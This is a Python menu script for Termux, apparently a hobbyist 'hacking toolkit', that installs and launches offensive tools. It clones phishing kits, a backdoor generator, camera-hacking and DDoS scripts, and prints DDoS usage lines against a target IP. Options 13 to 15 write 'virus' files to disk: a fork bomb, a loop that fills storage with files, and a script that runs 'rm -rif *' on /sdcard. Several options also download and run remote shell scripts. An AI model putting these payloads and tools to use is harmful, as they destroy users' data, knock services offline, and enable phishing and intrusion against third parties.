import gtts,compileall,pytube,time,os,requests
print('please wait...')
time.sleep(3)
os.system('clear')
tts = gtts.gTTS('Welcome to the world of programming and technology', lang='en')
tts.save('h.mp3')
os.system('play h.mp3')
os.system('clear')
time.sleep(2)
print('Welcome to the world of programming and technology')
time.sleep(5)
os.system('clear')
os.system('figlet khaled\n')
print('Telgram:@KhaledHussien1\n')
print('My channel on Telegram : https://t.me/+ypLV80YHXoE4NGZk\n')
print('1)command_linux')
print('2)tool_linux')
print('3)DDos Attack')
print('4)Linux distributions')
print('5)Exit')
a=input('choose number :')
#######################################
# main
if a == '5':
   os.system('exit')
def command_linux():
    if a =='1':
       os.system('clear')
       os.system('clear')
       print('*'*30)
       print('ls         this command show the files \n')
       print('pwd        this command show the path  \n')
       print('clear      this command to clean the screen  \n')
       print('ls -l      this Command to display files and the date they were created  \n')
       print('rm -rif *  this command delete all thing   \n')
       print('date       this command show date  \n')
       print('cat <file name>   This command displays the text inside the file\n')
       print('touch <file name> this command create file\n')
       print('mkdir <file name> this command create folder\n')
       print('rm <file name> this command delete file\n')
       print('rm -rif <folder name> this command delete any folder\n')
       print('nano <file name> this command edit on the text inside the file\n')
       print('whatis <command> this command To know the uses of it \n')
       print('wc -w <file name> this command To know the number of words in the file \n')
       print('wc -l <file name> this command To know the number of lines of the file \n')
       print('wc -m <file name> this command To find out how many characters are in the file\n') 
       print('wc -c <file name> this command To know the size of the file in bits\n')
       print('ls -a      this command  To display hidden files\n')
       print('chmod +x * this command To give permissions to the file\n')
       print('head <file name> this command Displays the first lines of the file\n')
       print('history    this command To see all the commands that you wrote before\n')                                
       print('tail <file name>  this command Displays the last lines in the file \n')
       print('echo <text> this command to print text \n')
       print('ifconfig    this command to to display the internal ip\n')
       print('cd <folder name> this command to enter the folder\n')
       print('don‘t write <>\n')
       print('*'*30)
command_linux()
if a == '2':
         os.system('clear')
         print('0)metasploit')
         print('1)hydra')
         print('2)nmap')
         print('3)crunch')
         print('4)wifite')
         print('5)aircrack-ng')
         print('6)cupp')
         print('7)sqlmap')
         print('8)create backdoor')
         print('9)Information about the ip')
         print('10)detect location')
         print('11)Get a website design')
         print('12)lazymux')
         print('13)Phone crash virus')
         print('14)Evening virus space phone')
         print('15)Virus to delete all files')
         print('16)Download videos from YouTube')
         print('17)Fake pages')
         print('18)hack camera')
         print('19)Encryption of Python scripts and tools')
         print('20)whois')
         print('21)sublist3r')
         print('22)dmitry')
         print('23)whatweb')
         print('24)hashcat')
         print('25)john The ripper')
         print('26)recon-ng')
         print('27)websploit')
         print('28)netcat')
         print('29)nikto')
         print('30)Apktool')
         print('31)adb to check the system')
         print('32)setoolkit')
         print('33)zphisher')
         print('34)WishFish')
         print('35)beef')
         m=input('choose number :')
         if m == '1':
            os.system('clear')
            print('copy and paste this command')      
            print('*'*20)
            print('apt update')
            print('apt install hydra')
            print('clear')
            print('hydra --help')
            print('*'*20) 
            os.system('proot-distro login ubuntu')
         if m == '2':
            os.system('pkg update && pkg install nmap && clear && nmap --help')
         if m == '3':
            os.system('pkg update && pkg insall crunch && clear && crunch --help')
         if m =='4':
            os.system('clear')            
            print('copy and paste this command')
            print('*'*20)
            print('apt update')
            print('apt install wifite')
            print('wifite')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '5':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update \napt install aircrack-ng \naircrack-ng')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '6':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update')
            print('apt install cupp')
            print('cupp -i')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m =='7':
             os.system('clear')
             print('copy and paste this command')
             print('*'*20)
             print('apt update')
             print('apt install sqlmap')
             print('sqlmap')
             print('*'*20)
             os.system('proot-distro login ubuntu')
         if m == '8':
            os.system('pkg update && pkg install git && pkg install python python2 &&git clone https://github.com/Ledear-Hacker/LEDEAR_HACKING ')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd LEDEAR_HACKING')
            print('python2 ledearhacking.py')
            print('*'*20)
         if m == '9':
            os.system('pkg update && pkg install git &&  pkg install python python3 && git clone https://github.com/noob-hackers/ipdrone')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd ipdrone')
            print('python3 ipdrone.py -v <ip>')
            print('*'*20)
         if m == '10':
            os.system('pkg update && pkg install git && pkg install php && pkg install python python3 && git clone https://github.com/thewhiteh4t/seeker.git')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd seeker\nchmod +x install.sh\n./install.sh\npython3 seeker.py')
            print('*'*20)
         if m == '11':
            os.system('pkg update && pkg install python python3 && pip install requests')
            os.system('clear')
            def kali():
                global m
                a = input('Enter url website :')
                p = requests.get(a)
                m = (p.text)
            kali()
            def kali2():
                r = open('information.html', 'w')
                r.write(m)
                r.close()
                print('the design saved in file information.html')
            kali2()
         if m == '12':
            os.system('pkg update && pkg install python && git clone https://github.com/Gameye98/Lazymux')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd Lazymux\npython lazymux.py')
            print('*'*20)
         if m == '13':
            with open("virus1.py", "w") as file:
                 file.write('while True:\n')
                 file.write('       os.fork()')            
            print('the virus saved in virus1.py')
         if m == '14':
            with open("virus2.py", "w") as file:
                  file.write('for i in range(999999999999999999999999999999999999999999999999):\n')
                  file.write('      with open(f"file{i}.txt", "w") as f:\n')
                  file.write('            f.write("This is a test file.")')
                  print('the virus saved in file virus2.py')
         if m == '15':
             with open("virus3.py", "w") as file:
                  file.write('import os \n')
                  file.write('os.system("termux-setup-storage")\n')
                  file.write('os.system("cd /sdcard")\n')
                  file.write('os.system("rm -rif *")')
                  print('the virus saved in virus3.py')
         if m == '16':
            os.system('pkg update && pkg install python3 && pip install pytube && clear')
            a = input('Enter url video :')
            link = (a)
            yt = pytube.YouTube(link)
            stream = yt.streams.filter(res="1080p").first()
            stream.download()
         if m == '17':
            os.system('git clone https://github.com/KasRoudra/PyPhisher')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd PyPhisher\npip3 install -r files/requirements.txt\npython3 pyphisher.py\n')
            print('*'*20)
         if m == '18':
            os.system('git clone https://github.com/hackermohamedPro/ALIENS.HaCK.Camera')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd ALIENS.HaCK.Camera\nbash alienshack.sh')
            print('*'*20)
         if m == '19':
            os.system('clear')
            a=input('Enter the File =>')
            compileall.compile_file(a)
            print('the script encoder inside folde __pycache__')
         if m == '20':
            os.system('pkg install whois && clear && whois --help')
         if m == '21':
            os.system('git clone https://github.com/aboul3la/Sublist3r.git')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd Sublist3r\npip install -r requirements.txt\npython3 sublist3r.py -d <domain>')
            print('*'*20)
         if m =='22':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install dmitry\nclear\ndmitry --help')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '23':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install whatweb\nclear\nwhatweb')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '24':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install hashcat\nclear\nhashcat')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '25':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install john\nclear\njohn')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '26':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install recon-ng\nrecon-ng')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '27':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install websploit\nwebsploit')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '28':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install netcat\nclear\nnetcat')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '29':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install nikto\nclear\nnikto')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '30':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('apt update\napt install apktool')
            print('*'*20)
            os.system('proot-distro login ubuntu')
         if m == '31':
            os.system('wget https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh && bash InstallTools.sh && clear && adb')
         if m == '32':
            os.system('git clone https://github.com/jithender2/SET-Installer.git ')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd SET-Installer\nchmod +x setup.sh\n./setup.sh\nsetoolkit')
            print('*'*20)
         if m == '33':
            os.system('git clone https://github.com/htr-tech/zphisher')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd zphisher\nchmod +x *\nbash zphisher.sh')
            print('*'*20)
         if m == '34':
            os.system('git clone https://github.com/kinghacker0/WishFish')
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd WishFish\nbash wishfish.sh')
            print('*'*20)
         if m == '35':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('download this file https://www.mediafire.com/file/clwj0wg414yxoj7/Installer.sh/file')
            print('after download write cd /sdcard/Download\ncp Installer.sh $HOME\ncd\nbash Installer.sh\ncd beef\nnano config.yaml put password and user cool\nbeef\ngo to browser http://127.0.0.1:3000/ui/panel')
            print('*'*20)
         if m == '0':
            os.system('clear')
            print('copy and paste this command')
            print('*'*20)
            print('cd ..\ncd usr\nmkdir opt\ncd\nwget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh\nchmod +x  metasploit.sh\nbash metasploit.sh')
            print('*'*20)
if a == '3':
   os.system('clear')
   print('1)HAMMER')
   print('2)LITEDDOD')
   print('3)slowloris')
   print('4)HULK')
   print('5)DDoS-Ripper')
   r=input('choose number :')
   if r == '1':
      os.system('git clone https://github.com/cyweb/hammer')
      os.system('clear')
      print('copy and paste this command')
      print('*'*20)
      print('cd hammer\nchmod +x hammer.py\npython3 hammer.py -s [IP target] -p [80] -t [135]')
      print('*'*20)
   if r == '2':
      os.system('git clone https://github.com/4L13199/LITEDDOS')
      os.system('clear')
      print('copy and paste this command')
      print('*'*20)
      print('cd LITEDDOS\npython2 LITEDDOS.py <ip> <port> <packet>')
      print('*'*20)
   if r == '3':
      os.system('git clone https://github.com/gkbrk/slowloris')
      os.system('clear')
      print('copy and paste this command')
      print('*'*20)
      print('cd slowloris\npython3 slowloris.py -v <ip> -s <socket> -p <port>')
      print('*'*20)
   if r == '4':
      os.system('git clone https://github.com/R3DHULK/HULK')
      os.system('clear')
      print('copy and paste this command')
      print('*'*20)
      print('cd HULK\npython hulk.py')
      print('*'*20)
   if r == '5':
      os.system('git clone https://github.com/palahsu/DDoS-Ripper.git')
      os.system('clear')
      print('copy and paste this command')
      print('*'*20)
      print('cd DDoS-Ripper\npython3 DRipper.py -s <ip> -p <port>')
      print('*'*20)
if a == '4':
   os.system('clear')
   print('1)root_termux')
   print('2)kali-linux')
   print('3)ubuntu')
   print('4)parrot os')
   print('5)fedora')
   k=input('choose number : ')
   if k == '1':
      os.system('clear')
      os.system('proot-distro login ubuntu')
   if k == '2':
      os.system('clear')
      print('copy and paste this command')
      print('*'*20)
      print('wget -O install-nethunter-termux https://offs.ec/2MceZWr\nchmod +x install-nethunter-termux\n./install-nethunter-termux')
      print('*'*20)
      print('choose number 1\nif found y or N  choose N \nif you want turn on Graphical interface write kex passwd and enter password and write kex &')
   if k == '3':
      print('after installtion turn on Graphical interface vncserver')
      time.sleep(5)
      os.system('pkg update -y && pkg install wget curl proot tar -y && wget https://raw.githubusercontent.com/AndronixApp/AndronixOrigin/master/Installer/Ubuntu20/ubuntu20-xfce.sh -O ubuntu20-xfce.sh && chmod +x ubuntu20-xfce.sh && bash ubuntu20-xfce.sh')   
   if k == '4':
      os.system('git clone https://github.com/RiSecID/parrot-in-termux.git')
      os.system('clear')
      print('copy and paste this command')
      print('*'*20)
      print('cd parrot-in-termux')
      print('chmod +x parrot.sh')
      print('./parrot.sh')
      print('apt update \napt install git')
      print('apt install xfce4 xfce4-whiskermenu-plugin xfce4-terminal -y')
      print('apt install  tigervnc-standalone-server -y')
      print('apt install dbus-x11\nvncserver')
      print('*'*20)
   if k == '5':
      os.system('pkg update -y && pkg install wget curl proot tar -y && wget https://raw.githubusercontent.com/AndronixApp/AndronixOrigin/master/Installer/Fedora/fedora-xfce.sh -O fedora-xfce.sh && chmod +x fedora-xfce.sh && bash fedora-xfce.sh')
#######################################
# special functions
